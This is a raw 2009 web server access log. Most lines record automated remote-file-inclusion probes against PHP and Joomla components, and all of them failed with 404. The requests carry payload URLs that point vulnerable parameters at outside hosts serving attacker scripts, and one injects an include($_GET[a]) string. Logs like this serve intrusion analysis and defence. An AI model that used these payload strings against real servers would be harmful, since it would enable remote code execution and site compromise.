83.98.209.71 - - [20/Jun/2009:03:27:45 -0400] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://stael.ru/media/system/one.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
83.98.209.71 - - [20/Jun/2009:03:27:51 -0400] "GET /logs/access_log.Q109052900//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://stael.ru/media/system/one.txt? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
83.98.209.71 - - [20/Jun/2009:03:27:52 -0400] "GET /logs/access_log.Q109060100//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://stael.ru/media/system/one.txt? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
61.109.250.45 - - [20/Jun/2009:03:28:37 -0400] "GET //include/print_category.php?setup[use_category]=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
61.109.250.45 - - [20/Jun/2009:03:28:37 -0400] "GET /logs//include/print_category.php?setup[use_category]=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
61.109.250.45 - - [20/Jun/2009:03:28:37 -0400] "GET /logs/access_log.Q109051900//include/print_category.php?setup[use_category]=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
68.109.233.157 - - [20/Jun/2009:03:28:55 -0400] "GET /logs/access_log.Q109052800//include/mail.inc.php?skin_board_path=http://geocities.com/blade_tea/idmaira.txt????? HTTP/1.1" 404 246 "-" "libwww-perl/5.79"
68.109.233.157 - - [20/Jun/2009:03:28:55 -0400] "GET //include/mail.inc.php?skin_board_path=http://geocities.com/blade_tea/idmaira.txt????? HTTP/1.1" 404 219 "-" "libwww-perl/5.79"
68.109.233.157 - - [20/Jun/2009:03:28:55 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://geocities.com/blade_tea/idmaira.txt????? HTTP/1.1" 404 224 "-" "libwww-perl/5.79"
209.59.12.99 - - [20/Jun/2009:03:29:30 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
61.109.250.45 - - [20/Jun/2009:03:29:52 -0400] "GET /logs/error_log.Q109051900//include/print_category.php?setup[use_category]=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
68.109.233.157 - - [20/Jun/2009:03:29:53 -0400] "GET /logs/error_log.Q109052800//include/mail.inc.php?skin_board_path=http://geocities.com/blade_tea/idmaira.txt????? HTTP/1.1" 404 245 "-" "libwww-perl/5.79"
83.222.193.94 - - [20/Jun/2009:03:30:05 -0400] "GET /logs/access_log.Q109051200//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
208.71.89.180 - - [20/Jun/2009:03:31:09 -0400] "GET /logs/access_log.Q109061000//errors.php?error=http://www.stmaryofthecataract.com/images/save.jpg? HTTP/1.1" 404 236 "-" "libwww-perl/5.811"
208.71.89.180 - - [20/Jun/2009:03:31:09 -0400] "GET /logs//errors.php?error=http://www.stmaryofthecataract.com/images/save.jpg? HTTP/1.1" 404 214 "-" "libwww-perl/5.811"
83.98.209.71 - - [20/Jun/2009:03:31:14 -0400] "GET /logs/access_log.Q109061300%20%20//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://stael.ru/media/system/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
83.98.209.71 - - [20/Jun/2009:03:31:51 -0400] "GET /logs/access_log.Q109051700%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
208.71.89.180 - - [20/Jun/2009:03:32:25 -0400] "GET /logs/access_log.Q109051000//errors.php?error=http://www.stmaryofthecataract.com/images/save.jpg? HTTP/1.1" 404 236 "-" "libwww-perl/5.811"
83.98.209.71 - - [20/Jun/2009:03:33:22 -0400] "GET /logs/access_log.Q109051600%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
209.59.12.99 - - [20/Jun/2009:03:34:48 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.59.12.99 - - [20/Jun/2009:03:39:49 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
200.101.192.223 - - [20/Jun/2009:03:40:20 -0400] "GET /logs/access_log.Q109052500/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.macwireless.com/help01.txt??? HTTP/1.1" 404 283 "-" "libwww-perl/5.76"
200.101.192.223 - - [20/Jun/2009:03:40:20 -0400] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.macwireless.com/help01.txt??? HTTP/1.1" 404 256 "-" "libwww-perl/5.76"
200.101.192.223 - - [20/Jun/2009:03:40:20 -0400] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.macwireless.com/help01.txt??? HTTP/1.1" 404 261 "-" "libwww-perl/5.76"
200.101.192.223 - - [20/Jun/2009:03:40:20 -0400] "GET /logs/access_log.Q109053000/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.macwireless.com/help01.txt??? HTTP/1.1" 404 283 "-" "libwww-perl/5.76"
69.94.125.100 - - [20/Jun/2009:03:40:35 -0400] "GET /logs//phpraider/authentication/phpbb2/phpbb2.functions.php?pConfig_auth[phpbb_path]=http://trinitysanpedro.org//id1.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
69.94.125.100 - - [20/Jun/2009:03:40:35 -0400] "GET //phpraider/authentication/phpbb2/phpbb2.functions.php?pConfig_auth[phpbb_path]=http://trinitysanpedro.org//id1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
69.94.125.100 - - [20/Jun/2009:03:40:35 -0400] "GET /logs/access_log.Q109060300%20%20//phpraider/authentication/phpbb2/phpbb2.functions.php?pConfig_auth[phpbb_path]=http://trinitysanpedro.org//id1.txt? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
121.165.73.157 - - [20/Jun/2009:03:40:48 -0400] "GET /logs/access_log.Q109052500/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.domplatz1.de/forum/gefel.txt? HTTP/1.1" 404 283 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
121.165.73.157 - - [20/Jun/2009:03:40:48 -0400] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.domplatz1.de/forum/gefel.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
121.165.73.157 - - [20/Jun/2009:03:40:48 -0400] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.domplatz1.de/forum/gefel.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
82.194.87.219 - - [20/Jun/2009:03:41:32 -0400] "GET /logs///errors.php?error=http://www.laubrotel.com/letter/id? HTTP/1.1" 404 215 "-" "libwww-perl/5.822"
217.147.29.190 - - [20/Jun/2009:03:41:56 -0400] "GET //phpraider/authentication/phpbb2/phpbb2.functions.php?pConfig_auth[phpbb_path]=http://trinitysanpedro.org//id1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
217.147.29.190 - - [20/Jun/2009:03:41:56 -0400] "GET /logs//phpraider/authentication/phpbb2/phpbb2.functions.php?pConfig_auth[phpbb_path]=http://trinitysanpedro.org//id1.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
217.147.29.190 - - [20/Jun/2009:03:41:56 -0400] "GET /logs/access_log.Q109060300%20%20//phpraider/authentication/phpbb2/phpbb2.functions.php?pConfig_auth[phpbb_path]=http://trinitysanpedro.org//id1.txt? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
124.217.216.86 - - [20/Jun/2009:03:42:14 -0400] "GET /logs/access_log.Q109053000/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.domplatz1.de/forum/gefel.txt? HTTP/1.1" 404 283 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
124.217.216.86 - - [20/Jun/2009:03:42:14 -0400] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.domplatz1.de/forum/gefel.txt? HTTP/1.1" 404 256 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
124.217.216.86 - - [20/Jun/2009:03:42:14 -0400] "GET /logs/access_log.Q109052500/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.domplatz1.de/forum/gefel.txt? HTTP/1.1" 404 283 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
124.217.216.86 - - [20/Jun/2009:03:42:14 -0400] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.domplatz1.de/forum/gefel.txt? HTTP/1.1" 404 261 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
66.249.71.54 - - [20/Jun/2009:03:43:13 -0400] "GET /images/nav_store_expr_blue.jpg HTTP/1.1" 200 1510 "-" "Googlebot-Image/1.0"
82.194.87.219 - - [20/Jun/2009:03:44:31 -0400] "GET /logs///index.php?p=http://www.laubrotel.com/letter/id? HTTP/1.1" 404 214 "-" "libwww-perl/5.822"
209.59.12.99 - - [20/Jun/2009:03:44:50 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.71.54 - - [20/Jun/2009:03:45:29 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L309BC44284D292009DBF047+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.14 - - [20/Jun/2009:03:45:39 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L309BC4428412420099BF047+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
82.194.87.219 - - [20/Jun/2009:03:45:42 -0400] "GET /logs///index.php?p=http://www.laubrotel.com/letter/id? HTTP/1.1" 404 214 "-" "libwww-perl/5.822"
66.249.71.14 - - [20/Jun/2009:03:45:50 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L309BC44284B2B20099BF047+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.14 - - [20/Jun/2009:03:46:00 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L309BC4428462820099BF047+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
69.94.125.100 - - [20/Jun/2009:03:46:47 -0400] "GET /logs/access_log.Q109060300//phpraider/authentication/phpbb2/phpbb2.functions.php?pConfig_auth[phpbb_path]=http://trinitysanpedro.org//id1.txt? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
81.21.69.179 - - [20/Jun/2009:03:47:50 -0400] "GET /logs/error_log.Q109051900//include/print_category.php?setup[use_category]=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
81.21.69.179 - - [20/Jun/2009:03:47:50 -0400] "GET /logs//include/print_category.php?setup[use_category]=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
81.21.69.179 - - [20/Jun/2009:03:47:50 -0400] "GET //include/print_category.php?setup[use_category]=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
217.147.29.190 - - [20/Jun/2009:03:48:20 -0400] "GET /logs/access_log.Q109060300//phpraider/authentication/phpbb2/phpbb2.functions.php?pConfig_auth[phpbb_path]=http://trinitysanpedro.org//id1.txt? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
83.98.209.71 - - [20/Jun/2009:03:48:22 -0400] "GET //content/multithumb/multithumb?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
83.98.209.71 - - [20/Jun/2009:03:48:22 -0400] "GET /logs//content/multithumb/multithumb?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
83.98.209.71 - - [20/Jun/2009:03:48:23 -0400] "GET /logs/access_log.Q109051100%20%20//content/multithumb/multithumb?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
209.59.12.99 - - [20/Jun/2009:03:49:49 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
83.98.209.71 - - [20/Jun/2009:03:50:25 -0400] "GET /logs/access_log.Q109052900%20%20//content/multithumb/multithumb?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
82.194.87.219 - - [20/Jun/2009:03:50:29 -0400] "GET /logs///index.php?pag=http://www.laubrotel.com/letter/id? HTTP/1.1" 404 214 "-" "libwww-perl/5.822"
83.98.209.71 - - [20/Jun/2009:03:51:47 -0400] "GET /logs/access_log.Q109051100//content/multithumb/multithumb?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
212.88.179.68 - - [20/Jun/2009:03:53:07 -0400] "GET /logs/access_log.Q109051800//galeria.php?start=0&kategoria=http://cakep.blixweb.no/v1/Bot/id.txt? HTTP/1.1" 404 237 "-" "libwww-perl/5.805"
212.88.179.68 - - [20/Jun/2009:03:53:07 -0400] "GET //galeria.php?start=0&kategoria=http://cakep.blixweb.no/v1/Bot/id.txt? HTTP/1.1" 404 210 "-" "libwww-perl/5.805"
212.88.179.68 - - [20/Jun/2009:03:53:07 -0400] "GET /logs//galeria.php?start=0&kategoria=http://cakep.blixweb.no/v1/Bot/id.txt? HTTP/1.1" 404 215 "-" "libwww-perl/5.805"
81.21.69.179 - - [20/Jun/2009:03:53:18 -0400] "GET /logs/access_log.Q109051900//include/print_category.php?setup[use_category]=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
212.88.179.68 - - [20/Jun/2009:03:53:27 -0400] "GET /logs/access_log.Q109060100//galeria.php?start=0&kategoria=http://cakep.blixweb.no/v1/Bot/id.txt? HTTP/1.1" 404 237 "-" "libwww-perl/5.805"
82.194.87.219 - - [20/Jun/2009:03:54:48 -0400] "GET /logs///index.php?pag=http://www.laubrotel.com/letter/id? HTTP/1.1" 404 214 "-" "libwww-perl/5.822"
209.59.12.99 - - [20/Jun/2009:03:54:50 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
123.143.98.5 - - [20/Jun/2009:03:54:59 -0400] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://yoursupplements4you.com/wp-content/themes/bluebrush/images/img08.jpg???? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
123.143.98.5 - - [20/Jun/2009:03:54:59 -0400] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://yoursupplements4you.com/wp-content/themes/bluebrush/images/img08.jpg???? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
123.143.98.5 - - [20/Jun/2009:03:55:01 -0400] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://yoursupplements4you.com/wp-content/themes/bluebrush/images/img08.jpg???? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
123.143.98.5 - - [20/Jun/2009:03:55:01 -0400] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://yoursupplements4you.com/wp-content/themes/bluebrush/images/img08.jpg???? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
123.143.98.5 - - [20/Jun/2009:03:55:04 -0400] "GET /logs/access_log.Q109060200/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://yoursupplements4you.com/wp-content/themes/bluebrush/images/img08.jpg???? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
123.143.98.5 - - [20/Jun/2009:03:55:09 -0400] "GET /logs/access_log.Q109060200/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://yoursupplements4you.com/wp-content/themes/bluebrush/images/img08.jpg???? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
66.249.71.14 - - [20/Jun/2009:03:55:59 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L309BC442848252009FBF047+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.71.241.146 - - [20/Jun/2009:03:56:10 -0400] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
66.71.241.146 - - [20/Jun/2009:03:56:10 -0400] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
66.71.241.146 - - [20/Jun/2009:03:56:10 -0400] "GET /logs/access_log.Q109052500%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
66.71.241.146 - - [20/Jun/2009:03:56:12 -0400] "GET /logs/access_log.Q109053000%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
212.88.179.68 - - [20/Jun/2009:03:56:52 -0400] "GET /logs/access_log.Q109060400//index.php?DOCUMENT_ROOT=http://cakep.blixweb.no/v1/Bot/id.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
212.88.179.68 - - [20/Jun/2009:03:56:52 -0400] "GET //index.php?DOCUMENT_ROOT=http://cakep.blixweb.no/v1/Bot/id.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
212.88.179.68 - - [20/Jun/2009:03:56:55 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://cakep.blixweb.no/v1/Bot/id.txt? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
123.143.98.5 - - [20/Jun/2009:03:57:21 -0400] "GET /logs/access_log.Q109060200%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://yoursupplements4you.com/wp-content/themes/bluebrush/images/img08.jpg???? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
123.143.98.5 - - [20/Jun/2009:03:57:22 -0400] "GET /logs/access_log.Q109060200%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://yoursupplements4you.com/wp-content/themes/bluebrush/images/img08.jpg???? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
123.143.98.5 - - [20/Jun/2009:03:57:51 -0400] "GET /logs/access_log.Q109052900%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://yoursupplements4you.com/wp-content/themes/bluebrush/images/img08.jpg???? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
123.143.98.5 - - [20/Jun/2009:03:57:53 -0400] "GET /logs/access_log.Q109052900%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://yoursupplements4you.com/wp-content/themes/bluebrush/images/img08.jpg???? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
78.40.226.135 - - [20/Jun/2009:03:57:59 -0400] "GET /logs/access_log.Q109060500//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.barrioarroyodulce.com.ar/media/header.jpg?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
91.149.157.130 - - [20/Jun/2009:03:58:19 -0400] "GET /logs/access_log.Q109053000/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://impeel.com/impeel/wizard/id1.txt? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
91.149.157.130 - - [20/Jun/2009:03:58:23 -0400] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://impeel.com/impeel/wizard/id1.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
91.149.157.130 - - [20/Jun/2009:03:58:23 -0400] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://impeel.com/impeel/wizard/id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
91.149.157.130 - - [20/Jun/2009:03:58:23 -0400] "GET /logs/access_log.Q109052500/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://impeel.com/impeel/wizard/id1.txt? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
200.49.175.157 - - [20/Jun/2009:03:58:29 -0400] "GET /logs/access_log.Q109052500/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://barfod.no/modules/fx29id.txt?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
200.49.175.157 - - [20/Jun/2009:03:58:29 -0400] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://barfod.no/modules/fx29id.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
200.49.175.157 - - [20/Jun/2009:03:58:29 -0400] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://barfod.no/modules/fx29id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
200.49.175.157 - - [20/Jun/2009:03:58:29 -0400] "GET /logs/access_log.Q109053000/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://barfod.no/modules/fx29id.txt?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
200.49.175.157 - - [20/Jun/2009:03:58:30 -0400] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://barfod.no/modules/fx29id.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
200.49.175.157 - - [20/Jun/2009:03:58:30 -0400] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://barfod.no/modules/fx29id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
200.49.175.157 - - [20/Jun/2009:03:58:30 -0400] "GET /logs/access_log.Q109052500/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://barfod.no/modules/fx29id.txt?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
200.49.175.157 - - [20/Jun/2009:03:58:30 -0400] "GET /logs/access_log.Q109053000/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://barfod.no/modules/fx29id.txt?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
193.231.42.152 - - [20/Jun/2009:03:58:43 -0400] "GET /logs/access_log.Q109060900///index.php?DOCUMENT_ROOT=http://10thplanet.com/playlist/scan/httpd.txt? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
193.231.42.152 - - [20/Jun/2009:03:58:43 -0400] "GET ///index.php?DOCUMENT_ROOT=http://10thplanet.com/playlist/scan/httpd.txt? HTTP/1.1" 404 209 "-" "libwww-perl/5.805"
193.231.42.152 - - [20/Jun/2009:03:58:44 -0400] "GET /logs///index.php?DOCUMENT_ROOT=http://10thplanet.com/playlist/scan/httpd.txt? HTTP/1.1" 404 214 "-" "libwww-perl/5.805"
66.71.241.146 - - [20/Jun/2009:03:59:38 -0400] "GET /logs/access_log.Q109052500/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
66.71.241.146 - - [20/Jun/2009:03:59:39 -0400] "GET /logs/access_log.Q109053000/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.die-grenzreiter.com/content/download/fx29id.txt??? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
209.59.12.99 - - [20/Jun/2009:03:59:50 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
193.231.42.152 - - [20/Jun/2009:04:00:13 -0400] "GET /logs/access_log.Q109060800///index.php?DOCUMENT_ROOT=http://10thplanet.com/playlist/scan/httpd.txt? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
91.121.156.60 - - [20/Jun/2009:04:01:07 -0400] "GET /%22//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=%22http://netcoreinvestments.com/idste.txt???? HTTP/1.1" 404 256 "-" "libwww-perl/5.826"
91.121.156.60 - - [20/Jun/2009:04:01:08 -0400] "GET /logs/%22//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=%22http://netcoreinvestments.com/idste.txt???? HTTP/1.1" 404 261 "-" "libwww-perl/5.826"
91.121.156.60 - - [20/Jun/2009:04:01:08 -0400] "GET /logs/access_log.Q109052400/%22//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=%22http://netcoreinvestments.com/idste.txt???? HTTP/1.1" 404 283 "-" "libwww-perl/5.826"
91.121.156.60 - - [20/Jun/2009:04:01:32 -0400] "GET /logs/access_log.Q109052500/%22//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=%22http://netcoreinvestments.com/idste.txt???? HTTP/1.1" 404 283 "-" "libwww-perl/5.826"
91.149.157.130 - - [20/Jun/2009:04:01:45 -0400] "GET /logs/access_log.Q109052500%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://impeel.com/impeel/wizard/id1.txt? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
91.149.157.130 - - [20/Jun/2009:04:01:45 -0400] "GET /logs/access_log.Q109053000%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://impeel.com/impeel/wizard/id1.txt? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
78.40.226.135 - - [20/Jun/2009:04:01:48 -0400] "GET /logs/access_log.Q109060500//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://yildizmotor.net/images/header.jpg?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
200.49.175.157 - - [20/Jun/2009:04:02:03 -0400] "GET /logs/access_log.Q109052500%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://barfod.no/modules/fx29id.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
200.49.175.157 - - [20/Jun/2009:04:02:03 -0400] "GET /logs/access_log.Q109053000%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://barfod.no/modules/fx29id.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
200.49.175.157 - - [20/Jun/2009:04:02:19 -0400] "GET /logs/access_log.Q109052500%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://barfod.no/modules/fx29id.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
200.49.175.157 - - [20/Jun/2009:04:02:19 -0400] "GET /logs/access_log.Q109053000%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://barfod.no/modules/fx29id.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
212.88.179.68 - - [20/Jun/2009:04:03:04 -0400] "GET /logs/error_log.Q109060400//index.php?DOCUMENT_ROOT=http://cakep.blixweb.no/v1/Bot/id.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
209.59.12.99 - - [20/Jun/2009:04:04:50 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.71.54 - - [20/Jun/2009:04:05:59 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L309BC4428432A20099BF047+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
151.1.154.24 - - [20/Jun/2009:04:06:27 -0400] "GET /web_statistics//tools/send_reminders.php?includedir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
151.1.154.24 - - [20/Jun/2009:04:06:27 -0400] "GET /logs/web_statistics//tools/send_reminders.php?includedir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
